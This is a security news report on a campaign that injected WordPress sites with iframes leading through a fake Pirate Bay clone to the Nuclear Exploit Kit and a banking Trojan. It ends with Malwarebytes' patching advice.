14 DAY TRIAL // Several websites running WordPress have been injected with malicious code redirecting visitors to a fake Pirate Bay website that exposes to drive-by attacks aimed at delivering a banking Trojan.
The iframe on the compromised sites does not look suspicious to the user, but it contains an obfuscated string that points to thepiratebay[.]in[.]ua, a clone of the famous torrent site, where another iframe leads to Nuclear Exploit Kit (EK).
Payload is not widely known to antivirus products
A warning message comes from security company Malwarebytes, which identified the same malicious iframe on multiple websites, saying that the attack may be substantial.
Researchers have determined that the browser-based attack tool leverages a vulnerability (CVE-2015-0311) affecting outdated versions of Flash (16.0.0.287 and earlier).
If the victim’s browser runs with an unpatched Flash, then the EK serves the exploit that facilitates the download of the payload.
The malware, detected by Malwarebytes as Trojan.Agent.ED, has a relatively low detection rate, as only 9 out of 56 antivirus engines on Virus Total raise the red flag for it.
Attacks believed to be connected to a previous operation
The researchers say that the threat is instructed to contact a command and control (C&C) server whose domain is in the Russian TLD space (usabrent[.]ru).
The method used by the perpetrators to infect the websites is not clear, but a common attack vector is a faulty WordPress component, such as a theme or other plug-in.
Malwarebytes suspects that the current operation may be related to an incident from last year involving RevSlider plug-in, when more than 100,000 websites were affected. The campaign was dubbed SoakSoak.
“To avoid getting their sites hacked, WordPress users need to check that they are running the latest WP install and that all their plugins are up to date. Other proper hygiene tips such as strong passwords and avoiding public wifi when logging into your site should also be applied,” Jerome Segura, senior security researcher at Malwarebytes, recommends.
